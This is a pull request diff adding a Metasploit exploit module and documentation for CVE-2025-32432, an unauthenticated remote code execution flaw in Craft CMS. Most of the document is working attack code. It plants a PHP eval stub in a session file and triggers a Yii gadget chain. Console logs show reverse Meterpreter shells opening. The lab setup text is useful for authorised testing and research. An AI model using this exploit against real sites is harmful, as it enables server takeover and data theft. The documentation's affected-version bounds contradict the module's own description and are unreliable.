### PR TITLE
Add new exploit for CVE-2025-32432: Craft CMS Preauth RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
+++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -144,15 +144,15 @@ msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options
 
 Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   ASSET_ID   60               yes       Existing asset ID
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT      80               yes       The target port (TCP)
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                yes       Base path
-   VHOST                       no        HTTP server virtual host
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   ASSET_ID  410              yes       Existing asset ID
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
+                                        etasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                      no        HTTP server virtual host
 
 
 Payload options (php/meterpreter/reverse_tcp):
@@ -169,6 +169,8 @@ Exploit target:
    --  ----
    0   PHP In-Memory
 
+
+
 View the full module info with the info, or info -d command.
 ```
 
@@ -176,11 +178,11 @@ View the full module info with the info, or info -d command.
 msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. License text detected
-[*] Making initial request to push payload and get a CSRF token..
-[*] Triggering code via assets/generate-transform
+[+] Leaked session.save_path: /var/lib/php/sessions
+[+] The target is vulnerable. Session path leaked
+[*] Injecting stub & triggering payload...
 [*] Sending stage (40004 bytes) to 172.24.0.2
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.24.0.2:42740) at 2025-04-26 05:00:08 +0200
+[*] Meterpreter session 12 opened (192.168.1.36:4444 -> 172.24.0.2:35238) at 2025-04-29 21:52:44 +0200
 
 meterpreter > sysinfo
 Computer    : exploit-craft-web
@@ -198,11 +200,11 @@ payload => cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. License text detected
-[*] Making initial request to push payload and get a CSRF token..
-[*] Triggering code via assets/generate-transform
+[+] Leaked session.save_path: /var/lib/php/sessions
+[+] The target is vulnerable. Session path leaked
+[*] Injecting stub & triggering payload...
 [*] Sending stage (3045380 bytes) to 172.24.0.2
-[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.24.0.2:47562) at 2025-04-26 05:02:02 +0200
+[*] Meterpreter session 13 opened (192.168.1.36:4444 -> 172.24.0.2:33436) at 2025-04-29 21:53:43 +0200
 
 meterpreter > sysinfo
 Computer     : 172.24.0.2

--- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
+++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -165,10 +165,10 @@ Exploit target:
    --  ----
    0   PHP In-Memory
 
-
-
 View the full module info with the info, or info -d command.
+```
 
+```bash
 msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)

--- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
+++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -124,14 +124,7 @@ set LHOST 192.168.1.36
 set LPORT 4444
 ```
 
-7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
-```bash
-set SRVPORT 9090
-set FETCH_SRVPORT 8081
-set FETCH_URIPATH /custom_payload_path
-```
-
-8. Run the exploit:
+7. Run the exploit:
 ```bash
 exploit
 ```

--- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
+++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -81,6 +81,10 @@ The module has the following option:
 For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`.
 This is necessary for successful exploitation when dealing with these versions.
 
+Craft CMS uses the notion of an "Asset" to manage files and media such as images and documents; each asset has a unique ID.
+This module does not perform bruteforcing of asset IDs to avoid noisy and inefficient exploitation attempts.
+
+
 ## Scenarios
 
 #### Successful Exploitation Against Craft CMS 5.5.0

--- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
+++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -1,0 +1,216 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in Craft CMS.
+
+The vulnerability lies in improper handling of image transformations, which can be exploited to
+inject and execute arbitrary PHP code on the server via crafted HTTP requests.
+
+---
+
+### Affected Versions
+
+- **3.x series**: `>= 3.9.15`
+- **4.x series**: `>= 4.14.15`
+- **5.x series**: `>= 5.6.17`
+
+---
+
+### Setting Up a Vulnerable Lab
+
+To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
+
+#### Docker Setup
+
+Install a specific vulnerable version of Craft CMS:
+
+```bash
+mkdir exploit-craft && \
+cd exploit-craft && \
+    # Configure DDEV (https://ddev.com/) project for Craft CMS \
+ddev config \
+  --project-type=craftcms \
+  --docroot=web \
+  --create-docroot \
+  --php-version="8.2" \
+  --database="postgres:15" \
+  --nodejs-version="20" && \
+    # Create the DDEV project
+ddev start -y && \
+    # Create Craft CMS with the specified version
+ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
+    # Install a vulnerable Craft CMS version
+ddev composer require "craftcms/cms:5.5.0" \
+  --no-scripts \
+  --no-interaction --with-all-dependencies && \
+    # Set the security key for Craft CMS
+ddev craft setup/security-key && \
+    # Install Craft CMS
+ddev craft install/craft \
+    --username=admin \
+    --password=password123 \
+    --email=admin@example.com \
+    --site-name=Testsite \
+    --language=en \
+    --site-url='$DDEV_PRIMARY_URL' && \
+ddev restart && \
+    # Launch the project
+echo 'Setup complete. Launching the project.' && \
+ddev launch
+```
+
+---
+
+## Verification Steps
+
+1. Start the vulnerable Craft CMS instance using the steps above.
+2. Launch `msfconsole`.
+3. Use the module: `use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432`.
+4. Set `RHOSTS` to the target Craft CMS instance.
+5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
+6. Execute the exploit with the `run` command.
+7. If successful, the module will execute the payload on the target.
+
+
+## Options
+
+The module has the following option:
+
+- **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series.
+    It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.
+
+For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`.
+This is necessary for successful exploitation when dealing with these versions.
+
+## Scenarios
+
+#### Successful Exploitation Against Craft CMS 5.5.0
+
+**Setup**:
+
+- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
+- Metasploit Framework.
+
+**Steps**:
+
+To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
+
+1. Start `msfconsole`:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
+```
+
+3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
+```bash
+set RHOSTS exploit-craft.ddev.site
+```
+
+4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
+   - `RPORT` is set to `80`.
+   - `TARGETURI` is set to `/`.
+
+5. Set the payload for exploitation. For example:
+```bash
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+```
+
+6. Set the local listener address and port:
+```bash
+set LHOST 192.168.1.36
+set LPORT 4444
+```
+
+7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
+```bash
+set SRVPORT 9090
+set FETCH_SRVPORT 8081
+set FETCH_URIPATH /custom_payload_path
+```
+
+8. Run the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
+
+##### For `ARCH_PHP`:
+
+```bash
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options
+
+Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   ASSET_ID   60               yes       Existing asset ID
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. License text detected
+[*] Making initial request to push payload and get a CSRF token..
+[*] Triggering code via assets/generate-transform
+[*] Sending stage (40004 bytes) to 172.24.0.2
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.24.0.2:42740) at 2025-04-26 05:00:08 +0200
+
+meterpreter > sysinfo
+Computer    : exploit-craft-web
+OS          : Linux exploit-craft-web 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+##### For `ARCH_CMD`:
+
+```bash
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set target 1
+target => 1
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. License text detected
+[*] Making initial request to push payload and get a CSRF token..
+[*] Triggering code via assets/generate-transform
+[*] Sending stage (3045380 bytes) to 172.24.0.2
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.24.0.2:47562) at 2025-04-26 05:02:02 +0200
+
+meterpreter > sysinfo
+Computer     : 172.24.0.2
+OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     <<~PHP
       #{php_preamble(disabled_varname: disabled_var)}
-      $c = base64_decode("#{payload_b64}");
+      $c=base64_decode("#{payload_b64}");
       #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
     PHP
   end

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -1,0 +1,203 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Payload::Php
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Craft CMS Preauth RCE Meterpreter (CVE-2025-32432)',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability
+          in Craft CMS versions 3.x, 4.x, and 5.x < 5.6.17 via the image transform endpoint.
+          It injects a PHP Meterpreter payload into the Craft session, then triggers its execution
+          by abusing the Yii behavior gadget chain (PhpManager) on the generate-transform endpoint.
+
+          Discovered in the wild by Orange Cyberdefense CSIRT and assigned CVE-2025-32432.
+        },
+        'Author' => [
+          'Nicolas Bourras (Orange Cyberdefense)', # Research + PoC
+          'Valentin Lobstein'                      # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2025-32432' ],
+          [ 'URL', 'https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/' ],
+          [ 'URL', 'https://blog.onyphe.io/en/cve-2025-32432-0day-craft-cms-discovered-by-orange-cyberdefense/' ]
+        ],
+        'Platform' => %w[php unix linux],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ],
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %(unix linux),
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DisclosureDate' => '2025-04-14',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(rand(2..3))])
+      ]
+    )
+  end
+
+  def check
+    csrf = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve cookies & CSRF') unless csrf
+
+    vprint_status("Using CSRF token: #{csrf}")
+
+    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
+    return CheckCode::Unknown('No response from generate-transform') unless res
+
+    if res.body.include?('If you did not receive a copy of the PHP license')
+      return CheckCode::Vulnerable('License text detected')
+    end
+
+    CheckCode::Safe('License text not detected')
+  end
+
+  def php_exec_cmd(encoded_payload)
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = '$' + vars[:dis]
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    shell = <<-END_OF_PHP_CODE
+            #{php_preamble(disabled_varname: dis)}
+            $c = base64_decode("#{encoded_clean_payload}");
+            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return shell
+  end
+
+  def exploit
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    final_payload = framework.encoders.create('php/base64').encode(phped_payload)
+
+    random_param_name = Rex::Text.rand_text_alphanumeric(rand(5..12))
+
+    first_payload = "<?=eval(\$_GET[\"#{random_param_name}\"]);die()?>"
+
+    print_status('Making initial request to push payload and get a CSRF token..')
+
+    craft_session_id, csrf = fetch_cookies_and_csrf(first_payload)
+    vprint_status("CraftSessionId: #{craft_session_id}")
+    vprint_status("Found CSRF token: #{csrf}")
+
+    print_status('Triggering code via assets/generate-transform')
+
+    json_data = {
+      'assetId' => datastore['ASSET_ID'],
+      'handle' => {
+        'width' => rand(100..500),
+        'height' => rand(100..500),
+        'as hack' => {
+          'class' => 'craft\\behaviors\\FieldLayoutBehavior',
+          '__class' => 'yii\\rbac\\PhpManager',
+          '__construct()' => [
+            {
+              'itemFile' => "/var/lib/php/sessions/sess_#{craft_session_id}"
+            }
+          ]
+        }
+      }
+    }.to_json
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param_name => final_payload },
+      'headers' => { 'X-CSRF-Token' => csrf },
+      'ctype' => 'application/json',
+      'data' => json_data,
+      'keep_cookies' => true
+    })
+  end
+
+  def fetch_cookies_and_csrf(payload_param = nil)
+    vars_get = { 'p' => 'admin/dashboard' }
+    vars_get['a'] = payload_param if payload_param
+
+    query_string = vars_get.map { |key, value| "#{key}=#{value}" }.join('&')
+
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php') + '?' + query_string
+    }
+
+    res1 = send_request_raw(opts)
+
+    craft_session_id = res1.headers['Set-Cookie'].split(';').find { |cookie| cookie.strip.start_with?('CraftSessionId=') }&.split('=')&.last&.strip
+    return nil unless craft_session_id
+
+    opts2 = {
+      'method' => 'GET',
+      'uri' => res1.headers['Location'],
+      'keep_cookies' => true
+    }
+
+    res2 = send_request_cgi(opts2)
+
+    return nil unless res2&.code == 200
+
+    csrf = res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+    return nil unless csrf
+
+    payload_param ? [craft_session_id, csrf] : csrf
+  end
+
+  def send_transform(csrf, asset_id, php_string)
+    json_data = {
+      'assetId' => asset_id,
+      'handle' => {
+        'width' => rand(100..500),
+        'height' => rand(100..500),
+        'as session' => {
+          'class' => 'craft\\behaviors\\FieldLayoutBehavior',
+          '__class' => 'GuzzleHttp\\Psr7\\FnStream',
+          '__construct()' => [
+            []
+          ],
+          '_fn_close' => php_string
+        }
+      }
+    }.to_json
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'p' => 'admin/actions/assets/generate-transform' },
+      'ctype' => 'application/json',
+      'headers' => { 'X-CSRF-Token' => csrf },
+      'data' => json_data
+    )
+  end
+end

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'keep_cookies' => true
     )
-    res2&.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+    res2&.get_html_document&.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
   end
 
   def leak_session_path(csrf)
@@ -219,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body.include?(sum.to_s)
       CheckCode::Vulnerable("Detected RCE: send #{a}+#{b}, got #{sum}!")
     else
-      CheckCode::Safe("Unable to exercise code execution.")
+      CheckCode::Safe('Unable to exercise code execution.')
     end
   end
 

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -156,6 +156,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res1 = send_request_raw(opts)
 
+    # The following line is supposed to work with res.get_cookies, but since we are using send_request_raw,
+    # we need to manually parse the Set-Cookie header here. The linter suggests using res.get_cookies, 
+    # but it doesn't work with send_request_raw. So, we're manually extracting the CraftSessionId cookie.
     craft_session_id = res1.headers['Set-Cookie'].split(';').find { |cookie| cookie.strip.start_with?('CraftSessionId=') }&.split('=')&.last&.strip
     return nil unless craft_session_id
 

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -71,110 +71,129 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    csrf = fetch_cookies_and_csrf
-    return CheckCode::Unknown('Could not retrieve cookies & CSRF') unless csrf
+    csrf_token = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve cookies & CSRF') if csrf_token.nil?
 
-    vprint_status("Using CSRF token: #{csrf}")
+    vprint_status "Using CSRF token: #{csrf_token}"
 
-    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
-    return CheckCode::Unknown('No response from generate-transform') unless res
+    response = send_transform(csrf_token, datastore['ASSET_ID'], 'phpinfo')
+    return CheckCode::Unknown('No response from generate-transform') if response.nil?
 
-    if res.body.include?('If you did not receive a copy of the PHP license')
-      return CheckCode::Vulnerable('License text detected')
+    if response.body.include?('If you did not receive a copy of the PHP license')
+      CheckCode::Vulnerable('License text detected')
+    else
+      CheckCode::Safe('License text not detected')
     end
-
-    CheckCode::Safe('License text not detected')
   end
 
   def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-            #{php_preamble(disabled_varname: dis)}
-            $c = base64_decode("#{encoded_clean_payload}");
-            #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
+    generator = Rex::RandomIdentifier::Generator.new
+    disabled_var = "$#{generator[:dis]}"
+    payload_b64 = Rex::Text.encode_base64(encoded_payload)
+
+    <<~PHP
+      #{php_preamble(disabled_varname: disabled_var)}
+      $c = base64_decode("#{payload_b64}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
+    PHP
   end
 
   def exploit
-    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-    final_payload = framework.encoders.create('php/base64').encode(phped_payload)
+    payload_code = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    encoded_payload = framework.encoders
+                               .create('php/base64')
+                               .encode(payload_code)
 
-    random_param_name = Rex::Text.rand_text_alphanumeric(5..12)
+    random_param = Rex::Text.rand_text_alphanumeric(5..12)
+    initial_payload = "<?=eval($_GET['#{random_param}']);die()?>"
 
-    first_payload = "<?=eval(\$_GET[\"#{random_param_name}\"]);die()?>"
+    print_status 'Making initial request to push payload and get a CSRF token'
+    session_id, csrf_token = fetch_cookies_and_csrf(initial_payload)
+    unless csrf_token
+      fail_with(Failure::Unknown, 'Could not retrieve session ID and CSRF token')
+    end
 
-    print_status('Making initial request to push payload and get a CSRF token..')
+    vprint_status "Session ID: #{session_id}"
+    vprint_status "CSRF token: #{csrf_token}"
 
-    craft_session_id, csrf = fetch_cookies_and_csrf(first_payload)
-    vprint_status("CraftSessionId: #{craft_session_id}")
-    vprint_status("Found CSRF token: #{csrf}")
-
-    print_status('Triggering code via assets/generate-transform')
-
-    json_data = {
-      'assetId' => datastore['ASSET_ID'],
-      'handle' => {
-        'width' => Rex::Text.rand_text_numeric(1..5),
-        'height' => Rex::Text.rand_text_numeric(1..5),
+    print_status 'Triggering code via assets/generate-transform'
+    request_payload = {
+      assetId: datastore['ASSET_ID'],
+      handle: {
+        width: Rex::Text.rand_text_numeric(1..5),
+        height: Rex::Text.rand_text_numeric(1..5),
         'as hack' => {
-          'class' => 'craft\\behaviors\\FieldLayoutBehavior',
-          '__class' => 'yii\\rbac\\PhpManager',
+          class: 'craft\\behaviors\\FieldLayoutBehavior',
+          __class: 'yii\\rbac\\PhpManager',
           '__construct()' => [
-            {
-              'itemFile' => "/var/lib/php/sessions/sess_#{craft_session_id}"
-            }
+            { itemFile: "/var/lib/php/sessions/sess_#{session_id}" }
           ]
         }
       }
     }.to_json
 
-    send_request_cgi({
+    send_request_cgi!(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param_name => final_payload },
-      'headers' => { 'X-CSRF-Token' => csrf },
+      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param => encoded_payload },
+      'headers' => { 'X-CSRF-Token' => csrf_token },
       'ctype' => 'application/json',
-      'data' => json_data,
+      'data' => request_payload,
       'keep_cookies' => true
-    })
+    )
+  end
+
+  def extract_csrf_token(res)
+    get_token = lambda do |r|
+      next unless r&.code == 200
+
+      r.get_html_document.at("//input[@name='CRAFT_CSRF_TOKEN']/@value")&.text
+    end
+
+    token = get_token.call(res)
+
+    if token.nil? || token.empty?
+      vprint_status 'CSRF not found, falling back to root'
+      fb_res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'keep_cookies' => true
+      )
+      token = get_token.call(fb_res)
+    end
+
+    token unless token.nil? || token.empty?
   end
 
   def fetch_cookies_and_csrf(payload_param = nil)
-    vars_get = { 'p' => 'admin/dashboard' }
-    random_param_name = Rex::Text.rand_text_alphanumeric(5..12)
-    vars_get[random_param_name] = payload_param if payload_param
+    rand_param = Rex::Text.rand_text_alphanumeric(5..12)
+    params = { 'p' => 'admin/dashboard', rand_param => payload_param }.compact
 
-    query_string = vars_get.map { |key, value| "#{key}=#{value}" }.join('&')
     cookie_jar.clear
-    opts = {
+    res = send_request_cgi(
       'method' => 'GET',
       'uri_encode_mode' => 'none',
-      'uri' => normalize_uri(target_uri.path, 'index.php') + '?' + query_string
-    }
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => params
+    )
+    return nil unless res
 
-    res1 = send_request_cgi(opts)
+    raw_cookies = res.get_cookies.to_s
+    session_id = raw_cookies.scan(/CraftSessionId=([^;]+)/).flatten.first
+    return nil if session_id.nil? || session_id.empty?
 
-    cookies = res1.get_cookies
-    craft_session_id = cookies.split(';').find { |cookie| cookie.strip.start_with?('CraftSessionId=') }&.split('=')&.last&.strip
-    return nil unless craft_session_id
+    if res.code == 302 && res.headers['Location']
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => res.headers['Location'],
+        'keep_cookies' => true
+      )
+    end
 
-    opts2 = {
-      'method' => 'GET',
-      'uri' => res1.headers['Location'],
-      'keep_cookies' => true
-    }
+    token = extract_csrf_token(res)
+    return nil unless token
 
-    res2 = send_request_cgi(opts2)
-
-    return nil unless res2&.code == 200
-
-    csrf = res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
-    return nil unless csrf
-
-    payload_param ? [craft_session_id, csrf] : csrf
+    payload_param ? [session_id, token] : token
   end
 
   def send_transform(csrf, asset_id, php_string)

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -148,18 +148,17 @@ class MetasploitModule < Msf::Exploit::Remote
     vars_get[random_param_name] = payload_param if payload_param
 
     query_string = vars_get.map { |key, value| "#{key}=#{value}" }.join('&')
-
+    cookie_jar.clear
     opts = {
       'method' => 'GET',
+      'uri_encode_mode' => 'none',
       'uri' => normalize_uri(target_uri.path, 'index.php') + '?' + query_string
     }
 
-    res1 = send_request_raw(opts)
+    res1 = send_request_cgi(opts)
 
-    # The following line is supposed to work with res.get_cookies, but since we are using send_request_raw,
-    # we need to manually parse the Set-Cookie header here. The linter suggests using res.get_cookies, 
-    # but it doesn't work with send_request_raw. So, we're manually extracting the CraftSessionId cookie.
-    craft_session_id = res1.headers['Set-Cookie'].split(';').find { |cookie| cookie.strip.start_with?('CraftSessionId=') }&.split('=')&.last&.strip
+    cookies = res1.get_cookies
+    craft_session_id = cookies.split(';').find { |cookie| cookie.strip.start_with?('CraftSessionId=') }&.split('=')&.last&.strip
     return nil unless craft_session_id
 
     opts2 = {

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -20,7 +20,6 @@ class MetasploitModule < Msf::Exploit::Remote
           in Craft CMS versions 3.x, 4.x, and 5.x < 5.6.17 via the image transform endpoint.
           It injects a PHP Meterpreter payload into the Craft session, then triggers its execution
           by abusing the Yii behavior gadget chain (PhpManager) on the generate-transform endpoint.
-
           Discovered in the wild by Orange Cyberdefense CSIRT and assigned CVE-2025-32432.
         },
         'Author' => [
@@ -62,112 +61,57 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
-        OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(2..3)])
-      ]
-    )
+    register_options([
+      OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(2..3)])
+    ])
   end
 
-  def check
-    csrf_token = fetch_cookies_and_csrf
-    return CheckCode::Unknown('Could not retrieve cookies & CSRF') if csrf_token.nil?
+  def execute_via_session(payload)
+    session_id, csrf, param_name = fetch_cookies_and_csrf
+    return nil unless csrf
 
-    vprint_status "Using CSRF token: #{csrf_token}"
+    vprint_status("Session ID: #{session_id} – stub injected under param #{param_name}")
 
-    response = send_transform(csrf_token, datastore['ASSET_ID'], 'phpinfo')
-    return CheckCode::Unknown('No response from generate-transform') if response.nil?
+    session_dir = @session_path || '/var/lib/php/sessions'
+    session_file = normalize_uri(session_dir, "sess_#{session_id}")
 
-    if response.body.include?('If you did not receive a copy of the PHP license')
-      CheckCode::Vulnerable('License text detected')
-    else
-      CheckCode::Safe('License text not detected')
-    end
-  end
-
-  def php_exec_cmd(encoded_payload)
